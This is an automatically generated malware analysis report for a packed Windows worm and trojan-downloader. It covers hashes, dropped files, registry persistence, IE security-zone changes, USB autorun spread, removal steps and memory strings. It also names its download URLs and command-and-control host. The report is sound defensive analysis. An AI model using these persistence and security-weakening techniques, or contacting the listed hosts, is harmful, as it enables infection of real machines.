Trojan-Downloader.Win32.Genome.gtff (Kaspersky), Trojan.Win32.IEDummy.FD, WormRebhip.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Worm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d04fe3b872d85220f0292ad2a0ce0257
SHA1: bc217aea57448d4520b5df460379bc9c885cf0aa
SHA256: 55da8bae46634d196e0d2d2e31e58dab38a294828ac8045e8c81459d67f63d46
SSDeep: 49152:py/YWWDaolr sAjHk4tI/viP3TL5HNlZLqBIOggPwH CB:kFWplrUY0ZDL7hh8wf
Size: 2449408 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: Sysinnals - www.sysinternals.com
Created at: 2014-04-30 13:07:04
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Worm creates the following process(es):
server.exe:616
musicmakersystem.exe:3188
The Worm injects its code into the following process(es):
iexplore.exe:396
%original file name%.exe:1912
File activity
The process server.exe:616 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%WinDir%\install\musicmakersystem.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XX--XX--XX.txt (3676 bytes)
The process iexplore.exe:396 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\XxX.xXx (3320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UuU.uUu (16 bytes)
%Documents and Settings%\%current user%\Application Data\logs.dat (15 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\UuU.uUu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxX.xXx (0 bytes)
C:\Temp\server.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XX--XX--XX.txt (0 bytes)
The process %original file name%.exe:1912 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\opera[1].exe (1655 bytes)
C:\Temp\ln.jpg (120 bytes)
C:\Temp\server.exe (147458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\server[1].exe (154269 bytes)
Registry activity
The process server.exe:616 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 5D B0 0F 9D 91 D7 30 58 7F A6 58 2D 48 27"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}]
"StubPath" = "%WinDir%\install\musicmakersystem.exe Restart"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies" = "%WinDir%\install\musicmakersystem.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Policies" = "%WinDir%\install\musicmakersystem.exe"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HKCU" = "%WinDir%\install\musicmakersystem.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HKLM" = "%WinDir%\install\musicmakersystem.exe"
The process iexplore.exe:396 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 DA 46 44 E0 00 C6 07 D0 10 3D 6B 87 57 AD 28"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%\install]
"musicmakersystem.exe" = "musicmakersystem"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\vítima]
"NewIdentification" = "vítima"
"FirstExecution" = "09/05/2014 -- 22:35"
The Worm modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Worm modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process musicmakersystem.exe:3188 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 81 BE B0 05 BB 05 2B 7F 94 0C F2 54 6C E4 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process %original file name%.exe:1912 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 5A 82 7B CB 1F 60 6B 7E 97 B3 A5 19 5E 6C 94"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
72cdafc4dba2ad59c23ea641c9c8e181 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\server[1].exe |
72cdafc4dba2ad59c23ea641c9c8e181 | c:\WINDOWS\install\musicmakersystem.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
server.exe:616
musicmakersystem.exe:3188
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%WinDir%\install\musicmakersystem.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XX--XX--XX.txt (3676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxX.xXx (3320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UuU.uUu (16 bytes)
%Documents and Settings%\%current user%\Application Data\logs.dat (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\opera[1].exe (1655 bytes)
C:\Temp\ln.jpg (120 bytes)
C:\Temp\server.exe (147458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\server[1].exe (154269 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HKCU" = "%WinDir%\install\musicmakersystem.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HKLM" = "%WinDir%\install\musicmakersystem.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1683456 | 525824 | 5.54489 | b3f5a2b082752b77b47300083a32d13a |
.itext | 1687552 | 8192 | 3584 | 5.41016 | ff17b643765d2b22cdde5bb79e8ead9c |
.data | 1695744 | 53248 | 21504 | 5.51734 | 3be9ebc8093c3e30d7312d9e541b2939 |
.bss | 1748992 | 552960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 2301952 | 16384 | 4608 | 5.44491 | e9d5c739878dbf28bb9c262bed85ad33 |
.didata | 2318336 | 4096 | 1024 | 4.7134 | d1eb9b0c903b3075fea415b65ea6bddd |
.tls | 2322432 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 2326528 | 4096 | 512 | 0.146134 | cd28fcbdf8b8ddec9941cd1ef59c32df |
.reloc | 2330624 | 147456 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2478080 | 528384 | 75264 | 5.43792 | dd8d47b94fed6a4bf4fc26f20dd15949 |
.debug | 3006464 | 7442432 | 1512448 | 5.54344 | 4ed7f01a00940c37b9671f7b0c9972b3 |
.aspack | 10448896 | 307200 | 303616 | 3.79947 | ff6b36bb725dcb4444ada0ec736d2bd1 |
.adata | 10756096 | 4096 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.cimsatas.com/test/server.exe | 212.252.45.201 |
hxxp://www.cimsatas.com/test/opera.exe | 212.252.45.201 |
ihateyou.no-ip.biz | 82.222.210.16 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /test/server.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cimsatas.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 09 Apr 2014 13:09:29 GMT
Accept-Ranges: bytes
ETag: "fabee7f0f453cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 May 2014 19:36:56 GMT
Content-Length: 483840
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P.......`.......p........@..............................................@..............................t...................................................................................................................UPX0.....`..............................UPX1.....P...p...P..................@....rsrc................T..............@..............................................................................................................................................................................................................................................................................................................................................................................3.00.UPX!....K.....W......M...&..&.........@...Byte......&..St....ringl..?......\.h.lpd@..{..\...TObject.%..A..NNN......NNNN..|xNNNNtplhNNNNd.`\NNNNX...l._NTP.<.z........Nx..S..S-...3............*.[.RPCw.3|3...t..64....s.dk....HDu.........t2..t.P..@H....Yr..G..1s...{..b...c...p...... ....SV...........=........d.-.....u.J#.........w.3.........L..ZB..^.....N...$.......}.g.W....9.t.W....w..t1..|9.....,0:<.."tw ...:08............).)....I...x..7x7k..0>_^..Us..S............< v..;"u[.....{........3....C<.1W..?ij.. ...wB...X.v..M.w.....
<<
<<< skipped >>>
GET /test/opera.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cimsatas.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 30 Apr 2014 10:09:54 GMT
Accept-Ranges: bytes
ETag: "326919555c64cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 May 2014 19:36:59 GMT
Content-Length: 2449408
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...H.`S....................\.|......p............@..........................0...................@..............................4.....%...............................-..............................................................................text...............................`....itext... ..........................`....data............T..................@....bss.....p...........l..............@....idata...@... #......l..............@....didata......`#......~..............@....tls.........p#.....................@....rdata........#.....................@....reloc...@....#.....................@....rsrc.........%..&..................@....debug....q...-.....................@....aspack......p........ .............`....adata....... .......`%.............@... .......4?....d...".....D....",..{..g....a ...7H.!%..<|v.yk....v.n\r.yJ.OV.z.=.@...H)T.*..&..wd.H.........c{.....r.y.....)......*.....0V.l....$}rB.......H.r.. .y.o{.o9....s9...}.......>....|.....H .1.....M..(...Xp.....L.........'Y...p.X.=i..]..._.v.x..>G.$.?.:.pP.L.%...E@m5..~...5f-..ayO../....\.@O,...|...]7..;u .id..|8..E..).1Y0.......E..8].R.66A.3[.. t{.u..TG.U....>.l.aH..2...q....y\.H....|p..E$.Z....M.r.j.p.:.!6Az?rYvXi-...r....Me.f\... .(R%...|p]b"O...R...{..KG#..QBG/.iY4...L=;.B80lu...~2...
<<
<<< skipped >>>
Map
The Worm connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1912_rwx_00DF7000_00002000:
kernel32.dll
kernel32.dll
user32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
version.dll
version.dll
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
msvcrt.dll
msvcrt.dll
shell32.dll
shell32.dll
urlmon.dll
urlmon.dll
winspool.drv
winspool.drv
RegUnLoadKeyW
RegUnLoadKeyW
URLDownloadToFileW
URLDownloadToFileW
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel>
1.0.0.0
iexplore.exe_396:
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
iexplore.exe_396_rwx_00150000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00290000_00001000:
kernel32.dll
iexplore.exe_396_rwx_002D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00310000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00350000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00390000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00C50000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00C90000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00CD0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00D10000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00D50000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00D90000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00DD0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00E10000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00E50000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00E90000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00ED0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00F10000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00F50000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00F90000_00001000:
kernel32.dll
iexplore.exe_396_rwx_00FD0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01010000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01050000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01090000_00001000:
kernel32.dll
iexplore.exe_396_rwx_010D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01110000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01150000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01190000_00001000:
kernel32.dll
iexplore.exe_396_rwx_011D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01210000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01250000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01290000_00001000:
kernel32.dll
iexplore.exe_396_rwx_012D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01310000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01350000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01390000_00001000:
kernel32.dll
iexplore.exe_396_rwx_013D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01410000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01450000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01490000_00001000:
kernel32.dll
iexplore.exe_396_rwx_014D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01510000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01550000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01590000_00001000:
kernel32.dll
iexplore.exe_396_rwx_015C0000_00001000:
GetProcessHeap
iexplore.exe_396_rwx_015D0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_01600000_00001000:
user32.dll
iexplore.exe_396_rwx_01740000_00001000:
user32.dll
iexplore.exe_396_rwx_01780000_00001000:
user32.dll
iexplore.exe_396_rwx_017B0000_00001000:
advapi32.dll
iexplore.exe_396_rwx_018F0000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01920000_00001000:
RegOpenKeyExA
iexplore.exe_396_rwx_01930000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01960000_00001000:
RegCloseKey
iexplore.exe_396_rwx_01970000_00001000:
advapi32.dll
iexplore.exe_396_rwx_019A0000_00001000:
oleaut32.dll
iexplore.exe_396_rwx_01AE0000_00001000:
oleaut32.dll
iexplore.exe_396_rwx_01B20000_00001000:
oleaut32.dll
iexplore.exe_396_rwx_01B60000_00001000:
oleaut32.dll
iexplore.exe_396_rwx_01B90000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01CD0000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01D10000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01D40000_00001000:
RegOpenKeyExA
iexplore.exe_396_rwx_01D50000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01D80000_00001000:
RegOpenKeyA
iexplore.exe_396_rwx_01D90000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01DD0000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01E00000_00001000:
RegEnumKeyExA
iexplore.exe_396_rwx_01E10000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01E50000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01E80000_00001000:
RegDeleteKeyA
iexplore.exe_396_rwx_01E90000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01EC0000_00001000:
RegCreateKeyA
iexplore.exe_396_rwx_01ED0000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01F00000_00001000:
RegCloseKey
iexplore.exe_396_rwx_01F10000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01F50000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01F90000_00001000:
advapi32.dll
iexplore.exe_396_rwx_01FD0000_00001000:
advapi32.dll
iexplore.exe_396_rwx_02010000_00001000:
advapi32.dll
iexplore.exe_396_rwx_02040000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02180000_00001000:
kernel32.dll
iexplore.exe_396_rwx_021C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02200000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02240000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02270000_00001000:
WinExec
iexplore.exe_396_rwx_02280000_00001000:
kernel32.dll
iexplore.exe_396_rwx_022C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02300000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02340000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02380000_00001000:
kernel32.dll
iexplore.exe_396_rwx_023C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02400000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02440000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02480000_00001000:
kernel32.dll
iexplore.exe_396_rwx_024C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02500000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02540000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02580000_00001000:
kernel32.dll
iexplore.exe_396_rwx_025C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_025F0000_00001000:
SetNamedPipeHandleState
iexplore.exe_396_rwx_02600000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02640000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02680000_00001000:
kernel32.dll
iexplore.exe_396_rwx_026C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02700000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02740000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02780000_00001000:
kernel32.dll
iexplore.exe_396_rwx_027C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02800000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02840000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02880000_00001000:
kernel32.dll
iexplore.exe_396_rwx_028C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02900000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02940000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02980000_00001000:
kernel32.dll
iexplore.exe_396_rwx_029C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02A00000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02A40000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02A80000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02AC0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02B00000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02B40000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02B80000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02BC0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02C00000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02C40000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02C80000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02CC0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02D00000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02D40000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02D80000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02DC0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02DF0000_00001000:
GetProcessHeap
iexplore.exe_396_rwx_02E00000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02E40000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02E80000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02EC0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02F00000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02F40000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02F80000_00001000:
kernel32.dll
iexplore.exe_396_rwx_02FC0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03000000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03040000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03080000_00001000:
kernel32.dll
iexplore.exe_396_rwx_030C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03100000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03140000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03180000_00001000:
kernel32.dll
iexplore.exe_396_rwx_031C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03200000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03240000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03280000_00001000:
kernel32.dll
iexplore.exe_396_rwx_032C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03300000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03340000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03380000_00001000:
kernel32.dll
iexplore.exe_396_rwx_033C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03400000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03440000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03480000_00001000:
kernel32.dll
iexplore.exe_396_rwx_034B0000_00001000:
CreatePipe
iexplore.exe_396_rwx_034C0000_00001000:
kernel32.dll
iexplore.exe_396_rwx_03500000_00001000:
